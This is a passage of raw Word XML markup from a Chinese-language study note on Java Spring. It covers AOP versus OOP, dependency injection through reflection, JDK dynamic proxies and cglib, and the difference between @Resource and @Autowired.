      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B078A" w:rsidRDefault="005B078A" w:rsidP="005B078A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>OO</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注重的是我们解决问题的方法</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>封装成</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Method),</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注重的是许多解决解决问题的方法中的共同点</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是对</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>OO</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>思想的一种补充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B078A" w:rsidRDefault="005B078A" w:rsidP="005B078A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>依赖注入：依赖注入其实就是控制反转，它分为构造方法注入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法注入，接口注入，我们最常用的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法注入。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>举个例子说明一下，我们在用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>配置的方式的话，都是将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>配置在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中，也有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>容器在初始化时就通过反射将容器中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例化，假如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>配置中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属性，就会反射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属性注入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中。这就是依赖注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B078A" w:rsidRDefault="005B078A" w:rsidP="005B078A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B078A" w:rsidRDefault="005B078A" w:rsidP="005B078A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>就是面向切面编程。它主要运用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jdk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvicationHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>接口实现。举例简单来说假如想要在原来的目标类的前后要加入日志的功能，目标类一定要实现一个接口，如果没有实现接口，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>就会用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cglib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>包实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。推荐的还是要实现一个接口。实现过程大概就是实现了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvicationHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>接口的方法，里边有一个属性是目标类，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>invoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法中利用反射执行目标类的方法，并在其前后加入日志的方法。然后将目标类的类加载器，目标类实现的接口和实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvicationHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>接口的方法传入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>newProxyInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法中。这样就实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。这样的话我们就可以在不修改任何代码的情况下在任何目标类中都可以动态的加入记日志的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00931CFE" w:rsidRDefault="00931CFE" w:rsidP="00931CFE">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r w:rsidRPr="00253A60">
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r w:rsidR="00F73BE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F73BE6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A60">
        <w:t>pring</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A60">
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@Resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@autowired</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
      <w:r w:rsidR="00646693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F01694" w:rsidRDefault="00F01694" w:rsidP="00931CFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@resou</w:t>
      </w:r>
      <w:r w:rsidR="00746E61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00931CFE" w:rsidRDefault="00931CFE" w:rsidP="00931CFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>private MyDao myDao</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怎么注入的的</w:t>
      </w:r>
      <w:r w:rsidR="00646693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="002A18F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r w:rsidR="00646693">
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="00646693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ava</w:t>
      </w:r>
      <w:r w:rsidR="00646693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码技术</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793E48" w:rsidRPr="00134F57" w:rsidRDefault="00793E48" w:rsidP="00793E48">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>二者区别</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: @Autowired</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>默认按类型装配</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, @Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>默认按名称装配</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当找不到与名称匹配的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>才会按类型匹配</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B078A" w:rsidRDefault="005B078A" w:rsidP="00134F57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
